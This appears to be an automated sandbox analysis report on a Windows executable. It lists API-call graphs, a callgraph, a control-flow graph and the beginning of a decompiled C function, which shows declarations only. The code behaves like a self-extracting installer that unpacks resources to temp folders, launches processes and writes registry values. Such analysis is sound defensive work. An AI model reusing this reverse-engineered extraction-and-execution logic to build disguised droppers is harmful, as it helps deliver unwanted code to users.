2633->2636 2637 1f6ce0 4 API calls 2634->2637 2635->2634 2636->2635 2639 1f185f FreeSid 2636->2639 2638 1f189f 2637->2638 2638->2568 2638->2574 2639->2635 2642 1f468f 7 API calls 2641->2642 2643 1f51f9 LocalAlloc 2642->2643 2644 1f522d 2643->2644 2645 1f520d 2643->2645 2646 1f468f 7 API calls 2644->2646 2647 1f44b9 20 API calls 2645->2647 2648 1f523a 2646->2648 2649 1f521e 2647->2649 2650 1f523e 2648->2650 2651 1f5262 lstrcmpA 2648->2651 2652 1f6285 GetLastError 2649->2652 2653 1f44b9 20 API calls 2650->2653 2654 1f527e 2651->2654 2655 1f5272 LocalFree 2651->2655 2657 1f2f4d 2652->2657 2656 1f524f LocalFree 2653->2656 2658 1f44b9 20 API calls 2654->2658 2655->2657 2656->2657 2657->2438 2657->2440 2657->2472 2659 1f5290 LocalFree 2658->2659 2659->2657 2661 1f468f 7 API calls 2660->2661 2662 1f5175 2661->2662 2663 1f517a 2662->2663 2664 1f51af 2662->2664 2665 1f44b9 20 API calls 2663->2665 2666 1f468f 7 API calls 2664->2666 2667 1f518d 2665->2667 2668 1f51c0 2666->2668 2667->2442 2822 1f6298 2668->2822 2671 1f51e1 2671->2442 2672 1f44b9 20 API calls 2672->2667 2674 1f468f 7 API calls 2673->2674 2675 1f55c7 LocalAlloc 2674->2675 2676 1f55fd 2675->2676 2677 1f55db 2675->2677 2679 1f468f 7 API calls 2676->2679 2678 1f44b9 20 API calls 2677->2678 2680 1f55ec 2678->2680 2681 1f560a 2679->2681 2682 1f6285 GetLastError 2680->2682 2683 1f560e 2681->2683 2684 1f5632 lstrcmpA 2681->2684 2696 1f55f1 2682->2696 2685 1f44b9 20 API calls 2683->2685 2686 1f564b LocalFree 2684->2686 2687 1f5645 2684->2687 2688 1f561f LocalFree 2685->2688 2689 1f565b 2686->2689 2690 1f5696 2686->2690 2687->2686 2688->2696 2695 1f5467 49 API calls 2689->2695 2691 1f589f 2690->2691 2694 1f56ae GetTempPathA 2690->2694 2692 1f6517 24 API calls 2691->2692 2692->2696 2693 1f6ce0 4 API calls 2697 1f2f7e 2693->2697 2698 1f56c3 2694->2698 2701 1f56eb 2694->2701 2699 1f5678 2695->2699 2696->2693 2697->2449 2697->2472 2834 1f5467 2698->2834 2699->2696 2702 1f44b9 20 API calls 2699->2702 2701->2696 2703 1f586c GetWindowsDirectoryA 2701->2703 2704 1f5717 GetDriveTypeA 2701->2704 2702->2696 2868 1f597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2706 1f5730 GetFileAttributesA 2704->2706 2719 1f572b 2704->2719 2706->2719 2710 1f5467 49 API calls 2710->2701 2711 1f2630 21 API calls 2711->2719 2713 1f57c1 GetWindowsDirectoryA 2713->2719 2714 1f658a CharPrevA 2716 1f57e8 GetFileAttributesA 2714->2716 2715 1f597d 34 API calls 2715->2719 2717 1f57fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 1f5827 SetFileAttributesA 2718->2719 2719->2696 2719->2703 2719->2704 2719->2706 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 1f5467 49 API calls 2719->2720 2864 1f6952 2719->2864 2720->2719 2722 1f6249 2721->2722 2723 1f6268 2721->2723 2724 1f44b9 20 API calls 2722->2724 2725 1f597d 34 API calls 2723->2725 2726 1f625a 2724->2726 2727 1f625f 2725->2727 2728 1f6285 GetLastError 2726->2728 2729 1f6ce0 4 API calls 2727->2729 2728->2727 2730 1f3013 2729->2730 2730->2455 2730->2472 2732 1f3b2d 2731->2732 2732->2732 2733 1f3b72 2732->2733 2734 1f3b53 2732->2734 2934 1f4fe0 2733->2934 2736 1f6517 24 API calls 2734->2736 2737 1f3b70 2736->2737 2738 1f6298 10 API calls 2737->2738 2739 1f3b7b 2737->2739 2738->2739 2739->2460 2741 1f2583 2740->2741 2742 1f2622 2740->2742 2744 1f258b 2741->2744 2745 1f25e8 RegOpenKeyExA 2741->2745 2961 1f24e0 GetWindowsDirectoryA 2742->2961 2746 1f25e3 2744->2746 2749 1f259b RegOpenKeyExA 2744->2749 2745->2746 2747 1f2609 RegQueryInfoKeyA 2745->2747 2746->2466 2748 1f25d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1f25bc RegQueryValueExA 2749->2750 2750->2748 2752 1f3bdb 2751->2752 2760 1f3bec 2751->2760 2753 1f468f 7 API calls 2752->2753 2753->2760 2754 1f3c03 memset 2754->2760 2755 1f3d13 2756 1f44b9 20 API calls 2755->2756 2757 1f3d26 2756->2757 2759 1f6ce0 4 API calls 2757->2759 2761 1f3f60 2759->2761 2760->2754 2760->2755 2760->2757 2762 1f3d7b CompareStringA 2760->2762 2763 1f3fd7 2760->2763 2765 1f3fab 2760->2765 2768 1f3f1e LocalFree 2760->2768 2769 1f3f46 LocalFree 2760->2769 2772 1f468f 7 API calls 2760->2772 2774 1f3cc7 CompareStringA 2760->2774 2785 1f3e10 2760->2785 2969 1f1ae8 2760->2969 3010 1f202a memset memset RegCreateKeyExA 2760->3010 3036 1f3fef 2760->3036 2761->2470 2762->2760 2762->2763 2763->2757 3060 1f2267 2763->3060 2767 1f44b9 20 API calls 2765->2767 2771 1f3fbe LocalFree 2767->2771 2768->2760 2768->2763 2769->2757 2771->2757 2772->2760 2774->2760 2775 1f3e1f GetProcAddress 2778 1f3f64 2775->2778 2775->2785 2776 1f3f92 2777 1f44b9 20 API calls 2776->2777 2779 1f3fa9 2777->2779 2780 1f44b9 20 API calls 2778->2780 2781 1f3f7c LocalFree 2779->2781 2782 1f3f75 FreeLibrary 2780->2782 2783 1f6285 GetLastError 2781->2783 2782->2781 2784 1f3f8b 2783->2784 2784->2757 2785->2775 2785->2776 2786 1f3eff FreeLibrary 2785->2786 2787 1f3f40 FreeLibrary 2785->2787 3050 1f6495 2785->3050 2786->2768 2787->2769 2789 1f468f 7 API calls 2788->2789 2790 1f3a55 LocalAlloc 2789->2790 2791 1f3a8e 2790->2791 2792 1f3a6c 2790->2792 2794 1f468f 7 API calls 2791->2794 2793 1f44b9 20 API calls 2792->2793 2795 1f3a7d 2793->2795 2796 1f3a98 2794->2796 2797 1f6285 GetLastError 2795->2797 2798 1f3a9c 2796->2798 2799 1f3ac5 lstrcmpA 2796->2799 2800 1f2f64 2797->2800 2801 1f44b9 20 API calls 2798->2801 2802 1f3b0d LocalFree 2799->2802 2803 1f3ada 2799->2803 2800->2438 2800->2472 2805 1f3aad LocalFree 2801->2805 2802->2800 2804 1f6517 24 API calls 2803->2804 2806 1f3aec LocalFree 2804->2806 2805->2800 2806->2800 2808 1f628f 2807->2808 2808->2472 2810 1f468f 7 API calls 2809->2810 2811 1f417d LocalAlloc 2810->2811 2812 1f41a8 2811->2812 2813 1f4195 2811->2813 2815 1f468f 7 API calls 2812->2815 2814 1f44b9 20 API calls 2813->2814 2816 1f41a6 2814->2816 2817 1f41b5 2815->2817 2816->2472 2818 1f41b9 2817->2818 2819 1f41c5 lstrcmpA 2817->2819 2821 1f44b9 20 API calls 2818->2821 2819->2818 2820 1f41e6 LocalFree 2819->2820 2820->2816 2821->2820 2823 1f171e _vsnprintf 2822->2823 2824 1f62c9 FindResourceA 2823->2824 2826 1f62cb LoadResource LockResource 2824->2826 2827 1f6353 2824->2827 2826->2827 2830 1f62e0 2826->2830 2828 1f6ce0 4 API calls 2827->2828 2829 1f51ca 2828->2829 2829->2671 2829->2672 2831 1f631b FreeResource 2830->2831 2832 1f6355 FreeResource 2830->2832 2833 1f171e _vsnprintf 2831->2833 2832->2827 2833->2824 2835 1f551a 2834->2835 2836 1f548a 2834->2836 2905 1f58c8 2835->2905 2894 1f53a1 2836->2894 2840 1f5495 2843 1f550c 2840->2843 2844 1f54c2 GetSystemInfo 2840->2844 2848 1f5581 2840->2848 2841 1f6ce0 4 API calls 2845 1f559a 2841->2845 2842 1f553b CreateDirectoryA 2846 1f5577 2842->2846 2847 1f5547 2842->2847 2850 1f658a CharPrevA 2843->2850 2855 1f54da 2844->2855 2845->2696 2858 1f2630 GetWindowsDirectoryA 2845->2858 2851 1f6285 GetLastError 2846->2851 2849 1f554d 2847->2849 2848->2841 2849->2848 2852 1f597d 34 API calls 2849->2852 2850->2835 2854 1f557c 2851->2854 2853 1f555c 2852->2853 2853->2848 2857 1f5568 RemoveDirectoryA 2853->2857 2854->2848 2855->2843 2856 1f658a CharPrevA 2855->2856 2856->2843 2857->2848 2859 1f266f 2858->2859 2860 1f265e 2858->2860 2862 1f6ce0 4 API calls 2859->2862 2861 1f44b9 20 API calls 2860->2861 2861->2859 2863 1f2687 2862->2863 2863->2701 2863->2710 2865 1f696e GetDiskFreeSpaceA 2864->2865 2866 1f69a1 2864->2866 2865->2866 2867 1f6989 MulDiv 2865->2867 2866->2719 2867->2866 2869 1f59dd GetDiskFreeSpaceA 2868->2869 2870 1f59bb 2868->2870 2872 1f5ba1 memset 2869->2872 2873 1f5a21 MulDiv 2869->2873 2871 1f44b9 20 API calls 2870->2871 2874 1f59cc 2871->2874 2875 1f6285 GetLastError 2872->2875 2873->2872 2876 1f5a50 GetVolumeInformationA 2873->2876 2877 1f6285 GetLastError 2874->2877 2878 1f5bbc GetLastError FormatMessageA 2875->2878 2879 1f5a6e memset 2876->2879 2880 1f5ab5 SetCurrentDirectoryA 2876->2880 2881 1f59d1 2877->2881 2882 1f5be3 2878->2882 2883 1f6285 GetLastError 2879->2883 2889 1f5acc 2880->2889 2886 1f6ce0 4 API calls 2881->2886 2884 1f44b9 20 API calls 2882->2884 2885 1f5a89 GetLastError FormatMessageA 2883->2885 2887 1f5bf5 SetCurrentDirectoryA 2884->2887 2885->2882 2888 1f5c11 2886->2888 2887->2881 2888->2701 2890 1f5b0a 2889->2890 2892 1f5b20 2889->2892 2891 1f44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 1f268b 2892->2917 2896 1f53bf 2894->2896 2895 1f171e _vsnprintf 2895->2896 2896->2895 2897 1f658a CharPrevA 2896->2897 2900 1f5415 GetTempFileNameA 2896->2900 2898 1f53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 1f544f CreateDirectoryA 2898->2899 2899->2900 2901 1f543a 2899->2901 2900->2901 2902 1f5429 DeleteFileA CreateDirectoryA 2900->2902 2903 1f6ce0 4 API calls 2901->2903 2902->2901 2904 1f5449 2903->2904 2904->2840 2906 1f58d8 2905->2906 2906->2906 2907 1f58df LocalAlloc 2906->2907 2908 1f58f3 2907->2908 2911 1f5919 2907->2911 2909 1f44b9 20 API calls 2908->2909 2910 1f5906 2909->2910 2912 1f6285 GetLastError 2910->2912 2914 1f5534 2910->2914 2913 1f658a CharPrevA 2911->2913 2912->2914 2915 1f5931 CreateFileA LocalFree 2913->2915 2914->2842 2914->2849 2915->2910 2916 1f595b CloseHandle GetFileAttributesA 2915->2916 2916->2910 2918 1f26b9 2917->2918 2919 1f26e5 2917->2919 2920 1f171e _vsnprintf 2918->2920 2921 1f271f 2919->2921 2922 1f26ea 2919->2922 2924 1f26cc 2920->2924 2923 1f26e3 2921->2923 2926 1f171e _vsnprintf 2921->2926 2925 1f171e _vsnprintf 2922->2925 2927 1f6ce0 4 API calls 2923->2927 2928 1f44b9 20 API calls 2924->2928 2929 1f26fd 2925->2929 2930 1f2735 2926->2930 2931 1f276d 2927->2931 2928->2923 2932 1f44b9 20 API calls 2929->2932 2933 1f44b9 20 API calls 2930->2933 2931->2881 2932->2923 2933->2923 2935 1f468f 7 API calls 2934->2935 2936 1f4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 1f515f 2936->2937 2938 1f5020 2936->2938 2937->2737 2939 1f5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2938->2939 2940 1f5057 2938->2940 2939->2940 2953 1f4efd 2940->2953 2943 1f507c 2946 1f44b9 20 API calls 2943->2946 2950 1f5075 2943->2950 2944 1f5060 2945 1f44b9 20 API calls 2944->2945 2945->2950 2946->2950 2947 1f511d 2949 1f513a 2947->2949 2951 1f44b9 20 API calls 2947->2951 2948 1f5110 FreeResource 2948->2947 2949->2937 2952 1f514c SendMessageA 2949->2952 2950->2947 2950->2948 2951->2949 2952->2937 2954 1f4f4a 2953->2954 2955 1f4980 25 API calls 2954->2955 2960 1f4fa1 2954->2960 2958 1f4f67 2955->2958 2956 1f6ce0 4 API calls 2957 1f4fc6 2956->2957 2957->2943 2957->2944 2959 1f4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 1f255b 2961->2962 2963 1f2510 2961->2963 2965 1f6ce0 4 API calls 2962->2965 2964 1f658a CharPrevA 2963->2964 2966 1f2522 WritePrivateProfileStringA _lopen 2964->2966 2967 1f2569 2965->2967 2966->2962 2968 1f2548 _llseek _lclose 2966->2968 2967->2746 2968->2962 2970 1f1b25 2969->2970 3074 1f1a84 2970->3074 2972 1f1b57 2973 1f658a CharPrevA 2972->2973 2975 1f1b8c 2972->2975 2973->2975 2974 1f66c8 2 API calls 2976 1f1bd1 2974->2976 2975->2974 2977 1f1bd9 CompareStringA 2976->2977 2978 1f1d73 2976->2978 2977->2978 2979 1f1bf7 GetFileAttributesA 2977->2979 2980 1f66c8 2 API calls 2978->2980 2981 1f1c0d 2979->2981 2982 1f1d53 2979->2982 2983 1f1d7d 2980->2983 2981->2982 2989 1f1a84 2 API calls 2981->2989 2984 1f1d64 2982->2984 2985 1f1df8 LocalAlloc 2983->2985 2986 1f1d81 CompareStringA 2983->2986 2987 1f44b9 20 API calls 2984->2987 2985->2984 2988 1f1e0b GetFileAttributesA 2985->2988 2986->2985 2995 1f1d9b 2986->2995 2990 1f1d6c 2987->2990 3001 1f1e1d 2988->3001 3009 1f1e45 2988->3009 2991 1f1c31 2989->2991 2994 1f6ce0 4 API calls 2990->2994 2992 1f1c50 LocalAlloc 2991->2992 2996 1f1a84 2 API calls 2991->2996 2992->2984 2993 1f1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2992->2993 3003 1f1cf8 2993->3003 3007 1f1cc2 2993->3007 3000 1f1ea1 2994->3000 2995->2995 2997 1f1dbe LocalAlloc 2995->2997 2996->2992 2997->2984 3002 1f1de1 2997->3002 3000->2760 3001->3009 3004 1f171e _vsnprintf 3002->3004 3005 1f1d09 GetShortPathNameA 3003->3005 3006 1f1d23 3003->3006 3004->3007 3005->3006 3008 1f171e _vsnprintf 3006->3008 3007->2990 3008->3007 3080 1f2aac 3009->3080 3011 1f209a 3010->3011 3012 1f2256 3010->3012 3014 1f171e _vsnprintf 3011->3014 3017 1f20dc 3011->3017 3013 1f6ce0 4 API calls 3012->3013 3015 1f2263 3013->3015 3016 1f20af RegQueryValueExA 3014->3016 3015->2760 3016->3011 3016->3017 3018 1f20fb GetSystemDirectoryA 3017->3018 3019 1f20e4 RegCloseKey 3017->3019 3020 1f658a CharPrevA 3018->3020 3019->3012 3021 1f211b LoadLibraryA 3020->3021 3022 1f212e GetProcAddress FreeLibrary 3021->3022 3023 1f2179 GetModuleFileNameA 3021->3023 3022->3023 3025 1f214e GetSystemDirectoryA 3022->3025 3024 1f21de RegCloseKey 3023->3024 3028 1f2177 3023->3028 3024->3012 3026 1f2165 3025->3026 3025->3028 3027 1f658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1f21b7 LocalAlloc 3028->3029 3030 1f21cd 3029->3030 3031 1f21ec 3029->3031 3032 1f44b9 20 API calls 3030->3032 3033 1f171e _vsnprintf 3031->3033 3032->3024 3034 1f2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 1f4106 3036->3037 3038 1f4016 CreateProcessA 3036->3038 3041 1f6ce0 4 API calls 3037->3041 3039 1f40c4 3038->3039 3040 1f4041 WaitForSingleObject GetExitCodeProcess 3038->3040 3042 1f6285 GetLastError 3039->3042 3043 1f4070 3040->3043 3044 1f4117 3041->3044 3046 1f40c9 GetLastError FormatMessageA 3042->3046 3107 1f411b 3043->3107 3044->2760 3048 1f44b9 20 API calls 3046->3048 3047 1f4096 CloseHandle CloseHandle 3047->3037 3049 1f40ba 3047->3049 3048->3037 3049->3037 3051 1f64c2 3050->3051 3052 1f658a CharPrevA 3051->3052 3053 1f64d8 GetFileAttributesA 3052->3053 3054 1f64ea 3053->3054 3055 1f6501 LoadLibraryA 3053->3055 3054->3055 3056 1f64ee LoadLibraryExA 3054->3056 3057 1f6508 3055->3057 3056->3057 3058 1f6ce0 4 API calls 3057->3058 3059 1f6513 3058->3059 3059->2785 3061 1f2289 RegOpenKeyExA 3060->3061 3062 1f2381 3060->3062 3061->3062 3064 1f22b1 RegQueryValueExA 3061->3064 3063 1f6ce0 4 API calls 3062->3063 3065 1f238c 3063->3065 3066 1f22e6 memset GetSystemDirectoryA 3064->3066 3067 1f2374 RegCloseKey 3064->3067 3065->2757 3068 1f230f 3066->3068 3069 1f2321 3066->3069 3067->3062 3070 1f658a CharPrevA 3068->3070 3071 1f171e _vsnprintf 3069->3071 3070->3069 3072 1f233f RegSetValueExA 3071->3072 3072->3067 3075 1f1a9a 3074->3075 3077 1f1aba 3075->3077 3079 1f1aaf 3075->3079 3093 1f667f 3075->3093 3077->2972 3078 1f667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 1f2be6 3080->3081 3082 1f2ad4 GetModuleFileNameA 3080->3082 3083 1f6ce0 4 API calls 3081->3083 3092 1f2b02 3082->3092 3084 1f2bf5 3083->3084 3084->2990 3085 1f2af1 IsDBCSLeadByte 3085->3092 3086 1f2bca CharNextA 3089 1f2bd3 CharNextA 3086->3089 3087 1f2b11 CharNextA CharUpperA 3088 1f2b8d CharUpperA 3087->3088 3087->3092 3088->3092 3089->3092 3091 1f2b43 CharPrevA 3091->3092 3092->3081 3092->3085 3092->3086 3092->3087 3092->3089 3092->3091 3098 1f65e8 3092->3098 3094 1f6689 3093->3094 3095 1f66a5 3094->3095 3096 1f6648 IsDBCSLeadByte 3094->3096 3097 1f6697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 1f65f4 3098->3099 3099->3099 3100 1f65fb CharPrevA 3099->3100 3101 1f6611 CharPrevA 3100->3101 3102 1f661e 3101->3102 3103 1f660b 3101->3103 3104 1f663d 3102->3104 3105 1f6627 CharPrevA 3102->3105 3106 1f6634 CharNextA 3102->3106 3103->3101 3103->3102 3104->3092 3105->3104 3105->3106 3106->3104 3108 1f4132 3107->3108 3110 1f412a 3107->3110 3111 1f1ea7 3108->3111 3110->3047 3112 1f1eba 3111->3112 3113 1f1ed3 3111->3113 3114 1f256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 1f2026 3115->3116 3117 1f1ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 1f200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3267 1f6a20 __getmainargs 3268 1f19e0 3269 1f1a24 GetDesktopWindow 3268->3269 3270 1f1a03 3268->3270 3271 1f43d0 11 API calls 3269->3271 3272 1f1a16 EndDialog 3270->3272 3274 1f1a20 3270->3274 3273 1f1a33 LoadStringA SetDlgItemTextA MessageBeep 3271->3273 3272->3274 3273->3274 3275 1f6ce0 4 API calls 3274->3275 3276 1f1a7e 3275->3276

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                        callgraph 0 Function_001F681F 99 Function_001F66F9 0->99 116 Function_001F6CE0 0->116 1 Function_001F171E 2 Function_001F621E 35 Function_001F597D 2->35 61 Function_001F6285 2->61 69 Function_001F44B9 2->69 2->116 3 Function_001F2F1D 3->2 16 Function_001F3A3F 3->16 22 Function_001F3B26 3->22 40 Function_001F256D 3->40 42 Function_001F4169 3->42 45 Function_001F5164 3->45 59 Function_001F658A 3->59 3->61 3->69 79 Function_001F3BA2 3->79 83 Function_001F55A0 3->83 112 Function_001F51E5 3->112 3->116 4 Function_001F411B 76 Function_001F1EA7 4->76 5 Function_001F5C17 6 Function_001F6517 6->69 7 Function_001F3210 23 Function_001F4224 7->23 7->35 7->59 7->69 87 Function_001F43D0 7->87 89 Function_001F58C8 7->89 8 Function_001F7010 9 Function_001F490C 10 Function_001F7208 11 Function_001F6C03 31 Function_001F724D 11->31 12 Function_001F4702 65 Function_001F1680 12->65 71 Function_001F16B3 12->71 13 Function_001F7000 14 Function_001F4200 15 Function_001F3100 15->87 16->6 57 Function_001F468F 16->57 16->61 16->69 17 Function_001F6C3F 18 Function_001F4C37 19 Function_001F2630 19->69 19->116 20 Function_001F6E2A 100 Function_001F6CF0 20->100 21 Function_001F202A 21->1 21->59 21->69 21->116 22->6 52 Function_001F6298 22->52 114 Function_001F4FE0 22->114 23->65 23->69 24 Function_001F7120 25 Function_001F6A20 26 Function_001F7155 27 Function_001F6F54 27->10 27->31 28 Function_001F6952 29 Function_001F4A50 30 Function_001F3450 30->87 32 Function_001F6648 33 Function_001F6F40 34 Function_001F667F 34->32 58 Function_001F268B 35->58 35->61 35->69 35->116 36 Function_001F487A 36->9 37 Function_001F2773 37->59 63 Function_001F1781 37->63 37->65 37->116 38 Function_001F7270 39 Function_001F6C70 115 Function_001F24E0 40->115 41 Function_001F476D 41->6 73 Function_001F66AE 41->73 42->57 42->69 43 Function_001F5467 43->35 43->59 43->61 43->63 43->65 81 Function_001F53A1 43->81 43->89 43->116 44 Function_001F2267 44->1 44->59 44->116 45->52 45->57 45->69 46 Function_001F4B60 47 Function_001F6A60 47->10 47->17 47->26 47->31 48 Function_001F7060 47->48 98 Function_001F2BFB 47->98 48->8 48->24 49 Function_001F6760 50 Function_001F5C9E 50->5 50->20 50->34 50->59 50->65 50->69 90 Function_001F66C8 50->90 50->116 117 Function_001F31E0 50->117 51 Function_001F4E99 51->65 52->1 52->116 53 Function_001F6495 53->59 53->63 53->116 54 Function_001F6793 55 Function_001F2390 55->55 55->59 55->65 55->71 55->116 56 Function_001F1F90 56->69 56->76 56->116 58->1 58->69 58->116 59->71 60 Function_001F2A89 62 Function_001F1A84 62->34 64 Function_001F4980 64->36 64->69 65->63 66 Function_001F3680 67 Function_001F6380 68 Function_001F6FBE 68->27 69->0 69->1 69->65 88 Function_001F67C9 69->88 69->116 70 Function_001F52B6 70->55 70->63 111 Function_001F65E8 70->111 113 Function_001F1FE1 70->113 70->116 71->63 72 Function_001F69B0 72->13 72->39 72->68 104 Function_001F71EF 72->104 74 Function_001F2AAC 74->65 91 Function_001F17C8 74->91 74->111 74->116 75 Function_001F2CAA 75->6 75->50 75->55 75->57 75->69 78 Function_001F18A3 75->78 106 Function_001F36EE 75->106 75->116 76->40 77 Function_001F6FA5 77->31 107 Function_001F17EE 78->107 78->116 79->21 79->44 79->53 79->57 79->61 79->63 79->69 103 Function_001F3FEF 79->103 109 Function_001F1AE8 79->109 79->116 80 Function_001F72A2 81->1 81->59 81->65 81->116 82 Function_001F6FA1 83->6 83->19 83->28 83->35 83->43 83->57 83->59 83->61 83->63 83->69 83->116 84 Function_001F4CA0 85 Function_001F4AD0 85->66 86 Function_001F4CD0 86->12 86->18 86->41 86->46 86->51 86->64 86->116 118 Function_001F47E0 86->118 87->116 88->54 89->59 89->61 89->65 89->69 90->32 92 Function_001F4CC0 93 Function_001F4BC0 94 Function_001F30C0 95 Function_001F63C0 95->59 95->63 95->116 96 Function_001F70FE 97 Function_001F4EFD 97->46 97->64 97->116 98->3 98->56 98->70 98->75 101 Function_001F34F0 101->66 101->69 101->87 102 Function_001F6EF0 103->4 103->61 103->69 103->116 105 Function_001F6BEF 106->0 106->60 106->69 106->88 110 Function_001F28E8 106->110 106->116 107->116 108 Function_001F70EB 109->1 109->59 109->62 109->63 109->65 109->69 109->71 109->74 109->90 109->116 110->37 110->60 112->57 112->61 112->69 114->57 114->69 114->97 115->59 115->116 116->100 118->65 118->69 119 Function_001F19E0 119->87 119->116

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 36 1f3ba2-1f3bd9 37 1f3bfd-1f3bff 36->37 38 1f3bdb-1f3bee call 1f468f 36->38 40 1f3c03-1f3c28 memset 37->40 44 1f3bf4-1f3bf7 38->44 45 1f3d13-1f3d30 call 1f44b9 38->45 42 1f3c2e-1f3c40 call 1f468f 40->42 43 1f3d35-1f3d48 call 1f1781 40->43 42->45 54 1f3c46-1f3c49 42->54 49 1f3d4d-1f3d52 43->49 44->37 44->45 55 1f3f4d 45->55 52 1f3d9e-1f3db6 call 1f1ae8 49->52 53 1f3d54-1f3d6c call 1f468f 49->53 52->55 69 1f3dbc-1f3dc2 52->69 53->45 65 1f3d6e-1f3d75 53->65 54->45 57 1f3c4f-1f3c56 54->57 59 1f3f4f-1f3f63 call 1f6ce0 55->59 61 1f3c58-1f3c5e 57->61 62 1f3c60-1f3c65 57->62 66 1f3c6e-1f3c73 61->66 67 1f3c67-1f3c6d 62->67 68 1f3c75-1f3c7c 62->68 75 1f3d7b-1f3d98 CompareStringA 65->75 76 1f3fda-1f3fe1 65->76 70 1f3c87-1f3c89 66->70 67->66 68->70 73 1f3c7e-1f3c82 68->73 71 1f3de6-1f3de8 69->71 72 1f3dc4-1f3dce 69->72 70->49 78 1f3c8f-1f3c98 70->78 79 1f3dee-1f3df5 71->79 80 1f3f0b-1f3f15 call 1f3fef 71->80 72->71 77 1f3dd0-1f3dd7 72->77 73->70 75->52 75->76 81 1f3fe8-1f3fea 76->81 82 1f3fe3 call 1f2267 76->82 77->71 84 1f3dd9-1f3ddb 77->84 85 1f3c9a-1f3c9c 78->85 86 1f3cf1-1f3cf3 78->86 87 1f3fab-1f3fd2 call 1f44b9 LocalFree 79->87 88 1f3dfb-1f3dfd 79->88 90 1f3f1a-1f3f1c 80->90 81->59 82->81 84->79 91 1f3ddd-1f3de1 call 1f202a 84->91 93 1f3c9e-1f3ca3 85->93 94 1f3ca5-1f3ca7 85->94 86->52 96 1f3cf9-1f3d11 call 1f468f 86->96 87->55 88->80 95 1f3e03-1f3e0a 88->95 97 1f3f1e-1f3f2d LocalFree 90->97 98 1f3f46-1f3f47 LocalFree 90->98 91->71 101 1f3cb2-1f3cc5 call 1f468f 93->101 94->55 102 1f3cad 94->102 95->80 103 1f3e10-1f3e19 call 1f6495 95->103 96->45 96->49 106 1f3fd7-1f3fd9 97->106 107 1f3f33-1f3f3b 97->107 98->55 101->45 112 1f3cc7-1f3ce8 CompareStringA 101->112 102->101 113 1f3e1f-1f3e36 GetProcAddress 103->113 114 1f3f92-1f3fa9 call 1f44b9 103->114 106->76 107->40 112->86 116 1f3cea-1f3ced 112->116 117 1f3e3c-1f3e80 113->117 118 1f3f64-1f3f76 call 1f44b9 FreeLibrary 113->118 125 1f3f7c-1f3f90 LocalFree call 1f6285 114->125 116->86 121 1f3e8b-1f3e94 117->121 122 1f3e82-1f3e87 117->122 118->125 123 1f3e9f-1f3ea2 121->123 124 1f3e96-1f3e9b 121->124 122->121 127 1f3ead-1f3eb6 123->127 128 1f3ea4-1f3ea9 123->128 124->123 125->55 130 1f3eb8-1f3ebd 127->130 131 1f3ec1-1f3ec3 127->131 128->127 130->131 133 1f3ece-1f3eec 131->133 134 1f3ec5-1f3eca 131->134 137 1f3eee-1f3ef3 133->137 138 1f3ef5-1f3efd 133->138 134->133 137->138 139 1f3eff-1f3f09 FreeLibrary 138->139 140 1f3f40 FreeLibrary 138->140 139->97 140->98
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F3BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
